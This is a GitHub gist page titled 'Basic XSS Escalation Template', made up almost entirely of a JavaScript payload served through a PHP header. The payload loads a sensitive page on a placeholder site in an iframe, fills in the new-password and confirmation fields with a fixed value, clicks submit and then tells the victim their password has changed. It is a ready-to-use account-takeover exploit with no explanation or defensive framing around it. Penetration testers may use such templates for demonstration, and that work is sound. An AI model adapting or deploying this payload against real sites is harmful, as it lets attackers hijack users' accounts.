Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Basic XSS Escalation Template
<?php
header("Content-Type: application/javascript");
?>
frame=document.createElement("iframe")
frame.addEventListener("load", function() {
setTimeout(function(){
//Once the iframe loads, give it 1 second to load the DOM
frame.contentDocument.getElementById("NewPassword").value="1337H4x0rz!!!"
//Set new password
frame.contentDocument.getElementById("ConfirmNewPassword").value="1337H4x0rz!!!"
//Set confirm password
frame.contentDocument.getElementById("SubmitButton").click()
//Click the submit button
setTimeout(function(){
//Wait a couple seconds for the previous request to be sent
alert("Your account password has been changed to 1337H4x0rz!!!")
}, 2000)
}, 1000)
});
//Create iframe and append it body
frame.src="https://vulnerableSite.com/sensative/action.php"
document.body.append(frame)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.